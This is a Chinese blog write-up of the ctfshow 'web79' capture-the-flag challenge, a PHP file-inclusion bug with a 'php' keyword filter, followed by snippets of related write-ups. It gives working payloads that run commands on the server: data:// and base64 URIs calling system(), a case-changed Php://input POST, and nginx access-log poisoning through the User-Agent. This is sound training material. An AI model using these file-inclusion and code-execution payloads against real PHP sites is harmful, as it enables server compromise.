[ctfshow web入门] web79 文件包含,关键字`php`过滤

原创 已于 2025-06-23 10:57:58 修改 · 496 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端 #web安全 #网络安全

于 2025-05-29 13:26:18 首次发布

信息收集

过滤了php,小问题

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

解题

data://text/plain

使用到<?php ?>可以用<?= ?>代替
flag.php可以用*?代替部分字符

或是直接使用base64编码

?file=data://text/plain,<?= system("tac fla*") ?>
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhKicpOyA/Pg==

php://input

php用大小写绕过

?file=Php://input
post:
<?php system('tac flag.php'); ?>

当你使用hackbar的时候,请使用raw模式发送post请求,否则服务端无法接收到post里的内容。这是一个issue,作者无法修复

日志包含

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

在这里插入图片描述

web78    目录    web80

CTFshow 文件包含 web79
Kradress的博客
12-07 737
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow web入门——文件上传
热门推荐
小元砸的博客
03-14 1万+
Web 151
Ctfshow web入门-web79-web81 WP
qq_45427131的博客
05-23 1586
web79 查看源码发现没有过滤,直接php伪协议包含 知识点——php伪协议 ,伪协议有很多,文件包含可以用php://filter payload: ?file=php://filter/read=convert.base64-encode/resource=需要包含的文件 执行,获取到base64加密之后的字符串然后解码 web80 查看代码,发现str_replace过滤了php,这个可以用大小写绕过,但是这里不推荐,因为能data命令执行 知识点——data命令执行: data:text/
php文件包含-CTFshow-web79
读万卷书,行万里路。
07-26 568
0 前言 在上一篇文章,我们尝试 5 种协议来实现文件包含。但在 web79 中,代码使用 str_replace 函数将字符串中的 php 替换成 ??? ,所以我们要尽可能的避免使用关键字 php。 1 file:// 或 不使用协议 方法同 php文件包含-CTFshow-web78 。 2 http:// 在上一篇文章中,使用的链接为 https://blog-1256032382.cos.ap-nanjing.myqcloud.com/eval.php,在链接的尾部含有 php 关键字,无法直接
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 651
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1957
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
CTFshow web入门之命令执行总结
小白的博客
05-10 612
1、命令执行函数。
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 2168
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
ctfshow web入门 文件包含 87
最新发布
01-01
### CTFShow Web 入门 文件包含 第87关 解题思路 #### 关键点分析 在Web87关中,代码逻辑如下: 当`$_GET['file']`存在时,变量$file获取该参数值。随后,$file会经过一系列替换操作,将字符串中的特定字符替换成...
CTFshow 文件上传 Web151-170复现笔记(保姆级复现
2401_83728643的博客
12-31 1563
ctfshow文件上传复现保姆级笔记
CTFshow web入门web79-文件包含2
weixin_74336671的博客
11-28 191
初始化界面:通过分析得知,此处对php进行过滤,因此此处我们使用date伪协议,data协议进行base64转码:?
ctfshow-web入门-文件包含web78、web79web80、web81)
m0_67403143的博客
12-23 838
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。的 base64 编码,也可以实现绕过。
ctfshow——web(持续更新)
qq_55202378的博客
10-27 824
查看源代码: base64编码特征:大小写+数字,偶尔最后几位是=。登录界面,先测一下是不是存在SQL注入漏洞 SQL注入常见的测试方法就是:再用sqlmap去跑数据库里的内容:(这里直接跑数据包) 看到函数,这一题应该是与文件包含有关。是包含GET传参中url参数的值,那么可以考虑php伪协议中的input协议和data协议。 关于php://input和data://text/plain,简单来说:故,poc:
ctfshow web入门文件包含
Blazing-Angel的博客
07-19 830
ctfshow
ctfshow web入门 78-88的文件包含
Firebasky的博客
09-18 4314
1. web78 PHP伪协议读取 ?file=php://filter/convert.base64-encode/resource=flag.php 2. web79 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs ===> <?php system('cat flag.php'); 然后查看源代码 3. web80-
CTFshow_web入门_文件包含
ScyLamb的博客
03-09 1190
文件包含 文章目录文件包含0x00 web780x01 web790x02 web800x03 web810x04 web820x05 web830x06 web840x07 web850x08 web860x09 web870x0A web880x0B web1160x0C web117 0x00 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); 无过滤 ?file=php://filter/
CTFShow文件包含(web78-88)
lonmar的博客
11-28 3208
web78 php://input + POSTdata命令执行 ?file=php://filter/convert.base64-encode/resource=flag.php web79 大小写绕过str_replace str_replace() 函数替换字符串中的一些字符(区分大小写)。 2. data:// ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web80 大小写
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值